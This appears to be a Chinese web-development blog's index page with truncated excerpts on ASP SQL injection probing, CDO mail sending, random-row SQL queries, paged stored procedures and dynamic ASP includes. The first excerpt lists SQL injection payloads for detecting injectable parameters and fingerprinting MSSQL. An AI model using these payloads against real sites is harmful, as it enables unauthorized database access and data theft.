-
- 全面认识ASP注入技巧
- Weather:晴 ,东南风 4-5级 ,最高气温18 ℃
- 2006-05-08
1.判断是否有注入
;and 1=1
;and 1=2
2.初步判断是否是mssql
;and user>0
3.注入参数是字符
'and [查询条件] and ''='
4.搜索时没过滤参数的
'and [查询条件] and '%25'='
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from...- Views(4445) | Comments(0) | In web develop
-
- 使用CDO.Message组件在线发送邮件
- Weather:晴 ,北风 4-5级 ,最低气温2 ℃
- 2006-03-25
以下为asp版本,组件都是相同的,使用语言不同,最多改一下里面的变量声明方法即可,通常此组件是用来在.net环境下发邮件用的.
sub CdoMail()
Const cdoSendUsingMethod="http://schemas.microsoft.com/cdo/configuration/sendusing"
Const cdoSendUsingPort=2
Const cdoSMTPServer="http://schemas.microsoft.com/cdo/configuration/smtpserver&q...- Views(6052) | Comments(0) | In web develop
-
- 随机读取数据库表內容的方法
- Weather:多云 ,西南风 5-6级 ,最高气温9 ℃
- 2006-03-10
- mySql
代码:
SELECT column FROM table
ORDER BY RAND()
LIMIT 1
PostgreSQL
代码:
SELECT column FROM table
ORDER BY RANDOM()
LIMIT 1
- Views(4788) | Comments(3) | In web develop
-
- 可以依据任何字段进行排序并分页的存储过程(z)
- Weather:阴 ,南风 4-5级 ,最高气温1 ℃
- 2006-02-28
之前用过的一些存储过程分页
大多数都只能根据主键排序,可是实际上,我们经常需要依据非主键排序并分页,比如,按工资大小
下面的代码能完成工作- Views(5125) | Comments(11) | In web develop
-
- asp动态include文件
- Weather:多云 ,北风 6-7级 ,最低气温-8 ℃
- 2005-12-03
- 受宏限制
必须存在该文件并且会预先编译(不管前面是否加以条件)经常有这样的要求,根据不同的需求要求include不同的文件
如各个人的不同设置,所以要求能动态include文件。代码如下:
<%
Function include(filename)
Dim re,content,fso,f,aspStart,aspEnd
set fso=CreateObject("Scripting.FileSystemObject")
set f=fso.OpenTextF... - Views(4679) | Comments(0) | In web develop
